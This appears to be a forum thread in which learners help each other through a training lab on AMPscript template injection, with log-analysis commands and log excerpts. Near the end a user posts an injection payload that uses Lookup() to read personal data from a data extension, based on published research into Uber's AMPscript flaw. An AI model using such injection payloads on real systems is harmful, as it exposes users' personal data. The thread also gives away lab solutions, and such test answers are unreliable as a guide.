Forum Discussion

GusC's avatar
GusC
Icon for Bronze III rankBronze III
2 months ago

Threat Research: AMPscript Analysis

This is one of those labs that I return to periodically and then abandon after half an hour whilst scratching my head........Does anyone have any pointers about how to approach this?

Which fields need to be populated in the webform? 

& which Test Contact Key is used? 

The one that's prepopulated: acb1730c-c3dc-4c1a-ad3d-207216370def

or the one in the briefing: e2e6555a-64a5-43ed-984e-1d342780b72f

many thanks in advance - Gus

 

    • GusC's avatar
      GusC
      Icon for Bronze III rankBronze III

      Hello - I have - do you have any other pointers ? thanks - G 

  • You have the issue that the response is always ""?
    And also curl with the address or local IP just gives a HTTP 500?
    And if you enter an invalid endpoint, it's still ""? 
    Same here. 

  • Ok, I have solved the lab again... 
    so, lets start... 

    first get the ip address: how? count which is the most ip address used... 
    something like this will give you some data:

    grep -i - * | awk '{print $8}' | sort | uniq -c | sort

    once you have the ip address, check again...

    ml-user@ampscript-evaluation:~/Desktop/logs$ grep "n.n.n.n" *
    api.log.1:2019-01-17 09:37:23,026 - [INFO] - AMPS_test_bed - n.n.n.n requested http://web-hook.imlcabs.iml/
    api.log.1:2019-01-17 09:37:23,117 - [INFO] - AMPS_test_bed - n.n.n.n requested http://web-hook.imlcabs.iml/preview?….
    business_unit=&endpoint=&extension=driver_partners&headers=&message=%25%25[
    api.log.1:2019-01-17 09:37:33,644 - [INFO] - AMPS_test_bed - Processing message from n.n.n.n: %%[
    api.log.1:2019-01-17 09:37:33,690 - [INFO] - AMPS_test_bed - n.n.n.n authenticated successfully with contact key abcdefgh-ijkl-mnop-qrts-uvwxyz123456

    --> abcdefgh-ijkl-mnop-qrts-uvwxyz123456 will be what you want... that's the lookup key and the test contact key

    also note the URL used...:

    http://web-hook.imlcabs.iml/preview?….business_unit=&endpoint=&extension=driver_partners&headers=&message=%25%25[

    if you check the data, you'll even see the 'Message' used. 

    if you do your query (the log will tell you what you need to enter), you'll get an aswer/result like:

    {"result":"Hi there I'm DARTH_VADER_YOUR_MASTER and I created this tool.\r"}

    (of course it's not Darth Vader) :)

    and when you dig further in the log.. around line 940... you'll find the last mesage to re-use and count...

     

    • GusC's avatar
      GusC
      Icon for Bronze III rankBronze III

      Hi Netcat - yes thats exactly what I mean, I click on "preview" on the page web-hook.imlcabs.iml and I get "" unders JSON etc. 

      Thanks Steven - I had already got Q5 and Q6 - I'm stuck on how to populate the web application to pull back the name of the attacker, using the key 5*** - do you have some info around that? 

       

      • steven's avatar
        steven
        Icon for Silver I rankSilver I

        so, base for this hack is this --> https://www.assetnote.io/resources/research/gaining-access-to-ubers-user-data-through-ampscript-evaluation

        try for the message:

        Message:
        %%[
        SET @firstName = Lookup('driver_partners', 'firstname', 'partner_uuid', "5....")
        ]%%
        Hi there I'm %%=V(@firstName)=%% and I created this tool.

        btw, you'll find all the nessesairy messages to solve the lab in the log. maybe you need to use cyberchef and urldecode.